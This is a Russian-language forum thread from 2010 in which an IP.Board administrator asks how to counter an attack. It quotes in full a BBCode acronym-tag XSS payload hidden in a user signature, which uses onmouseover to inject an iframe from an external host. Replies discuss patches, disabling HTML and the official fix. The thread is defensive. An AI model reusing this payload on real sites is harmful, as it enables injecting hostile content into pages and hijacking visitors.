Пытаются взломать что делать

[fagediba 0]

Есть форум ipb

 

один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код

 

[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]

 

 

вот как работает тег акронима:

[acronym='Laugh Out Loud']lol[/acronym]


<acronym title='{option}'>{content}</acronym>

 

Как защититься и что делать?

 

тема обсуждается тут

http://ipbskins.ru/forum/topic5228.html

http://forum.searchengines.ru/showthread.php?p=6476617

http://forum.antichat.ru/showthread.php?p=1960546

http://forums.ibresource.ru/index.php?showtopic=60138

Изменено 7 марта 2010 пользователем fagediba

[Ph-A 395]

Есть форум ipb

IP.Board версия: 1.x ?

 

Как защититься и что делать?

1. Использовать не ломанную версию форума со всеми патчами безопасности.

 

2. Разрешить HTML в сообщениях?

Если функция включена, то пользователи могут использовать HTML в личных сообщениях. Рекомендуем отключить данную функцию из соображений безопасности.

 

3. Разрешить HTML в подписи?

Разрешение данной функции НЕ рекомендуется, если вы не полностью доверяете пользователям, которым разрешено добавлять подпись.

[fagediba 0]

236 форум, хтмл теги атакующий не использовал

[fagediba 0]

Атакующий скрыл подпись под цвет фона

color="#EEF2F7"

 

Можно ли как-то запретить использовать в теге любые цвета? только те оставить, которые black, red и тд.?

 

Тогда левые скрипты на странице хотя бы будут видны

[Ph-A 395]

тема обсуждается тут

Смысл так плодить тему....

 

К тому, что написал Ritsuka, добавить нечего.

 

+ жалоба в freehostia.com

[fagediba 0]

> К тому, что написал Ritsuka, добавить нечего.

 

ну запретил я акроним, запретил онмаузовер, и что, это остановит чтоли? значит используя другие теги построят свою конструкцию. Нужно чтобы грамотно кто-нибудь составил изменения в обработчик парсера

[Fisana 700]

bb- коды в подписях отключила...

Спасибо.

[fagediba 0]

Подписи тут ни при чем. Текст можно разместить в любом месте, в посте допустим. Извиняюсь что расплодил код, сейчас его уже не убрать, я не думал что так сложно будет этому противодействовать

 

http://forums.ibresource.ru/index.php?showtopic=60138

 

вон там ритсука в подписи разместила (или разместил?) - навести если табличка вылезает

[Ph-A 395]

Подписи тут ни при чем. Текст можно разместить в любом месте, в посте допустим.

Угу.

 

 

вон там ритсука в подписи разместила (или разместил?) - навести если табличка вылезает

Разместил (ОН). Я читал молча, добавить было нечего

[fagediba 0]

Официальный фикс xss с акронимом в 2.3.6

 

Изменения

 

sources/classes/bbcode/class_bbcode_core.php

Изменено 8 марта 2010 пользователем Ph-A
Код битый, нельзя использовать

[Ph-A 395]

Официальный фикс xss с акронимом в 2.3.6

Arhar на ibresource его раскритиковал. И привел другое решение

http://forums.ibresource.ru/index.php?s=&a...st&p=363021